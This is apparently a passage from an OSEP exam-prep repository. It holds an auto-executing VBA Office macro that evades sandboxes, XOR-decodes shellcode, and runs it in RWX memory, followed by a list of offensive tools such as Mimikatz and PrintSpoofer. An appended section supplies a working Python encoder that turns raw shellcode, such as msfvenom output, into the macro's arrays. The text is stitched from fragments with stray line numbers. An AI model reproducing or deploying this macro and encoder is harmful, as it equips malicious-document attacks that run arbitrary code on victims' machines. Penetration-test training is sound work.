Private Declare PtrSafe Function FlsAlloc Lib "KERNEL32" (ByVal callback As LongPtr) As LongPtr
Sub MyMacro()
    Dim allocRes As LongPtr
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As LongPtr

    ' Call FlsAlloc and verify if the result exists
    allocRes = FlsAlloc(0)
    If IsNull(allocRes) Then
        End
    End If

    ' Shellcode encoded with XOR with key 0xfa/250 (output from C# helper tool of cas van cooten)
    ' If payload more than 25 lines, split it and join as below

    asd = Array(buf)
    das = Array(buf)

    buf = Split(Join(asd, ",") & "," & Join(das, ","), ",")
    ' Allocate memory space
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    ' Decode the shellcode
    For i = 0 To UBound(buf)
        buf(i) = buf(i) Xor 250
    Next i

    ' Move
```
the shellcode 602 | For counter = LBound(buf) To UBound(buf) 603 | data = buf(counter) 604 | res = RtlMoveMemory(addr + counter, data, 1) 605 | Next counter 606 | 607 | ' Execute the shellcode 608 | res = CreateThread(0, 0, addr, 0, 0, 0) 609 | End Sub 610 | Sub Document_Open() 611 | MyMacro 612 | End Sub 613 | Sub AutoOpen() 614 | MyMacro 615 | End Sub 616 | ``` -------------------------------------------------------------------------------- /Useful Resources/Tools.md: -------------------------------------------------------------------------------- 1 | # List of Tools/Scripts/Payload I have used so far in OSEP Labs 2 | ## Non Exhaustive list, Will update as I use more 3 | --- 4 | 1. [PEASS](https://github.com/carlospolop/PEASS-ng) 5 | 2. [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 6 | 3. [BloodHound](https://github.com/BloodHoundAD/BloodHound) 7 | 4. [Mimikatz](https://github.com/gentilkiwi/mimikatz) 8 | 5. [Rubeus](https://github.com/GhostPack/Rubeus) 9 | 6. [Metasploit](https://github.com/rapid7/metasploit-framework) 10 | 7. [SSHUTTLE](https://github.com/apenwarr/sshuttle) 11 | 8. [Chisel](https://github.com/jpillora/chisel) 12 | 9. [Impacket](https://github.com/SecureAuthCorp/impacket) 13 | 10. [Nishang](https://github.com/samratashok/nishang) 14 | 11. [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) *Straight exploit* 15 | 12. [VBA](https://github.com/itm4n/VBA-RunPE/blob/master/RunPE.vba) 16 | -------------------------------------------------------------------------------- /images/Default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ross46/OSEP-PREP/62c43ccde53f081a19e65f14ca0898b6013569df/images/Default.png --------------------------------------------------------------------------------
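The XOR step and the 25-line split that the macro in Payloads.md above relies on have to be produced by a separate encoder; the macro's comment points at Cas van Cooten's C# helper, which is not reproduced in this repo. The script below is an added example, not part of the original repo and not that helper, that does the same job in Python: it XORs raw shellcode with 0xFA, emits the bytes as decimal VBA `Array()` statements capped at 25 physical lines each (VBA rejects more than 24 line continuations in one statement), emits the `Split(Join(...))` line that glues the chunks back into one `buf`, and parses its own output back to confirm the round trip. The array names `buf0`, `buf1`, ... and the 50-values-per-line width are my choices, and the NOP sled is a constructed sample; the macro uses `asd`/`das`, so rename or paste accordingly.

```python
import re
import sys

XOR_KEY = 0xFA        # the macro decodes with buf(i) Xor 250
VBA_MAX_LINES = 25    # 24 line continuations allowed per VBA statement, i.e. 25 physical lines


def xor_encode(shellcode: bytes, key: int = XOR_KEY) -> list[int]:
    """Encode raw shellcode as the decimal values the macro stores in its Array()."""
    return [b ^ key for b in shellcode]


def xor_decode(values, key: int = XOR_KEY) -> bytes:
    """Inverse of xor_encode; mirrors the macro's decode loop."""
    return bytes(v ^ key for v in values)


def vba_array_statement(name: str, values, per_line: int = 50) -> list[str]:
    """Render `name = Array(...)` across physical lines joined with VBA's ` _` continuation."""
    if not values:
        raise ValueError("empty chunk")
    rows = [values[i:i + per_line] for i in range(0, len(values), per_line)]
    if len(rows) > VBA_MAX_LINES:
        raise ValueError(f"{len(rows)} lines exceeds VBA's continuation limit; split into more arrays")
    lines = []
    for i, row in enumerate(rows):
        head = f"{name} = Array(" if i == 0 else "    "
        tail = ")" if i == len(rows) - 1 else ", _"
        lines.append(head + ",".join(str(v) for v in row) + tail)
    return lines


def render_macro_arrays(shellcode: bytes, per_line: int = 50, max_lines: int = VBA_MAX_LINES) -> str:
    """Emit one Array() statement per chunk (buf0, buf1, ...; names are my choice) plus the
    Split/Join line that rebuilds a single `buf`, as the macro does with asd/das."""
    encoded = xor_encode(shellcode)
    per_chunk = per_line * max_lines
    chunks = [encoded[i:i + per_chunk] for i in range(0, len(encoded), per_chunk)]
    out, names = [], []
    for idx, chunk in enumerate(chunks):
        name = f"buf{idx}"
        names.append(name)
        out.extend(vba_array_statement(name, chunk, per_line))
    joined = ' & "," & '.join(f'Join({n}, ",")' for n in names)
    out.append(f'buf = Split({joined}, ",")')
    return "\n".join(out)


def decode_rendered(vba_text: str, key: int = XOR_KEY) -> bytes:
    """Round-trip check: pull the decimal values back out of the rendered VBA and decode them."""
    values = []
    for line in vba_text.splitlines():
        if line.startswith("buf = Split("):
            continue
        # drop the `bufN = Array(` prefix so the digit in the array name is not picked up
        body = line.split("Array(", 1)[1] if "Array(" in line else line
        values.extend(int(v) for v in re.findall(r"\d+", body))
    return xor_decode(values, key)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # real use: raw shellcode file, e.g. the output of `msfvenom ... -f raw`
        with open(sys.argv[1], "rb") as fh:
            sample = fh.read()
    else:
        # constructed sample: a NOP sled, not real shellcode
        sample = b"\x90" * 120
    text = render_macro_arrays(sample)
    assert decode_rendered(text) == sample, "round trip failed"
    print(text)
```

Run it as `python3 encode.py payload.bin > arrays.vba` and paste the output in place of the `asd`/`das` lines; with no argument it encodes the constructed NOP sled so the format can be eyeballed. The `Split` output in VBA is an array of strings, which is why the macro's `Xor 250` still works: VBA coerces `"106"` to a number for the operator and `data = buf(counter)` coerces the result back to `Long`.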